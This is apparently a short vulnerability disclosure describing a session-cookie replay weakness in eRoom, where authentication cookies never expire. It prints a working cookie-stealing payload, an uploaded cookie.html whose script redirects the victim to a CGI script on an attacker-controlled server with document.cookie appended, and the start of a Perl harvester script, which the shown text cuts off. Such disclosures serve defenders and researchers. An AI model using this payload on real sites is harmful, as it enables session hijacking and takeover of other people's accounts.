Cookies used for authentication in eRoom seem to be set up in a
manner that allows a simple replay
attack to be performed. The session cookie does not expire, as such,
once it has been compromised
and harvested, anyone can then replay the cookie and gain access to
the site as the original user.
Evil user uploads an html file to eRoom, the victim browses the file
cookie.html, which will send
the users cookie information to a cgi script on a malicious web
server and harvest the detials.
These cookie details can then be used in a replay attack giving the
attacker the potential to gain
access to the web site as the user who accessed cookie.html.
/* cookie.html */
html
head
titleRaiding the cookie jar/title
/head
body
br
scriptdocument.location='https://10.1.1.2/cgi-bin/cookie.cgi?'
+document.cookie/script
br
/body
/html
/* cookie.cgi */
#!/usr/bin/perl
use
